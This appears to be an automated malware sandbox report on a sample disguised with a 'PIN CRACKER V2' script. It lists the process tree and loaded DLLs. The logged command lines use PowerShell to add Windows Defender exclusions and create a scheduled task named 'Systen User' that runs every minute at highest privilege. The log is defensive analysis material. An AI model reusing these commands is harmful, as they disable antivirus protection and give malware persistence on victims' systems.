                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" "
                            Source: ozgpPwVAu1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ozgpPwVAu1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: ozgpPwVAu1.exeReversingLabs: Detection: 63%
                            Source: unknownProcess created: C:\Users\user\Desktop\ozgpPwVAu1.exe "C:\Users\user\Desktop\ozgpPwVAu1.exe"
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess created: C:\Users\user\adawsfaefasfasfg.exe "C:\Users\user\adawsfaefasfasfg.exe"
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess created: C:\Users\user\wasdwasfwasfs.exe "C:\Users\user\wasdwasfwasfs.exe"
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where curl
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wasdwasfwasfs.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'adawsfaefasfasfg.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Systen User'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User"
                            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Systen User "C:\Users\user\AppData\Roaming\Systen User"
                            Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess created: C:\Users\user\adawsfaefasfasfg.exe "C:\Users\user\adawsfaefasfasfg.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess created: C:\Users\user\wasdwasfwasfs.exe "C:\Users\user\wasdwasfwasfs.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" "Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'adawsfaefasfasfg.exe'Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Systen User'Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User"Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wasdwasfwasfs.exe'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where curlJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: avicap32.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: msvfw32.dllJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: avicap32.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: msvfw32.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Windows\System32\where.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
